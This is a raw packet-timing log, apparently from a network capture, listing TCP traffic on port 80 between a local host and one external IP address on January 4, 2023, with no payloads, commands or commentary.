Jan 4, 2023 16:47:24.595755100 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.604260921 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.604324102 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.604383945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605165958 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605214119 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605232000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605232000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605262995 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605278969 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605312109 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605330944 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605359077 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605371952 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605405092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605421066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605460882 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605484962 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605529070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605576038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605577946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605577946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605623960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605632067 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605671883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605683088 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605717897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605765104 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605767965 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605767965 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605813026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605827093 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605859041 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605866909 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605906963 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605952978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.605956078 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.605956078 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606002092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606049061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606050968 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606050968 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606096983 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606146097 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606148005 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606148005 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606194019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606240034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606245041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606245041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606287956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606333971 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606338978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606338978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606379986 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606426954 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606431961 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606431961 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606473923 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606522083 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606523991 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606523991 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606570959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606616974 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606618881 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606618881 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606663942 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606713057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606713057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606746912 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606796026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606841087 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606856108 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606856108 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606889009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606935978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.606976032 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606976032 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606976032 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.606986046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607033014 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607048035 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607079983 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607100010 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607125998 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607141018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607172012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607187986 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607225895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607274055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607275963 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607275963 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607338905 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607351065 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607387066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607431889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607441902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607441902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607477903 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607515097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607526064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607539892 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607573032 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607579947 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607624054 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607670069 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607671022 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607671022 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607717991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607764006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607768059 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607768059 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607814074 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607861042 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607861996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607861996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607909918 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607956886 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.607956886 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.607956886 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.608007908 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.608053923 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.608058929 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.608058929 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.608100891 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.608146906 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.608153105 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.608153105 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.608190060 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.608225107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.608505011 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.747037888 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.773626089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.784018993 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.784255028 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.784297943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.784316063 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.784316063 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.784342051 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.784363985 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.784387112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.784388065 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.784430981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.784467936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.784476995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.784476995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.784533024 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.784548044 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.784567118 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.784589052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.784589052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.784604073 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.784622908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.784657001 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786250114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786293983 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786338091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786340952 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786340952 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786392927 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786391973 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786408901 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786452055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786453009 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786488056 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786497116 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786497116 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786531925 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786539078 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786576986 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786618948 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786621094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786621094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786663055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786710978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786711931 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786729097 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786772013 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786783934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786814928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786858082 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786859989 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786859989 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786901951 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786942959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.786947012 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786947012 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.786987066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.787031889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.787031889 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.787031889 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.787075043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.787081957 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.787117958 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.787127972 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.787162066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.787167072 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.787204981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.787216902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.787256002 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.788351059 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.788395882 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.788427114 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.788440943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.788486004 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.788527966 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.788570881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.788573980 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.788609028 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.788650990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.788682938 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.788682938 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.788682938 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.788692951 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.788736105 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.788737059 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.788737059 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.788779020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.788789988 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.788820982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.788863897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.788865089 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.788865089 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.788901091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.788943052 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.788983107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.788983107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.788991928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789040089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789083004 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789124966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789124966 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789124966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789124966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789170027 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789212942 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789216042 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789216042 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789254904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789297104 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789302111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789302111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789340973 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789352894 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789383888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789427042 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789469957 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789510965 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789554119 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789556026 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789556026 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789556026 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789597988 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789664030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789684057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789684057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789684057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789707899 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789711952 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789742947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.789766073 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789766073 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.789896965 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.988559008 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.023269892 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.023308039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.023334026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.023363113 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.023386955 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.023413897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.023437977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.023463964 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.023474932 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.023474932 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.023490906 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.023515940 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.023540020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.023551941 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.023551941 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.023597956 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.023597956 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.025432110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025464058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025495052 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025518894 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025543928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025553942 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.025576115 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025598049 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025616884 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.025616884 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.025624990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025651932 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025676012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025686979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.025686979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.025701046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025727034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025738001 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.025738001 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.025753021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025779009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025784016 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.025784016 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.025804996 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025830030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025835037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.025835037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.025857925 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025882006 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.025882006 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.025887012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025914907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025938988 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.025940895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.025938988 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.025969028 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.026025057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.026025057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.026025057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.026050091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.026074886 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.026103973 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.026441097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.027503967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.027535915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.027561903 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.027581930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.027607918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.027607918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.027662039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.027689934 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.027713060 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.027723074 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.027724028 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.027740002 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.027765989 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.027780056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.027780056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.027795076 CET	80	49695	109.107.173.210	192.168.2.4
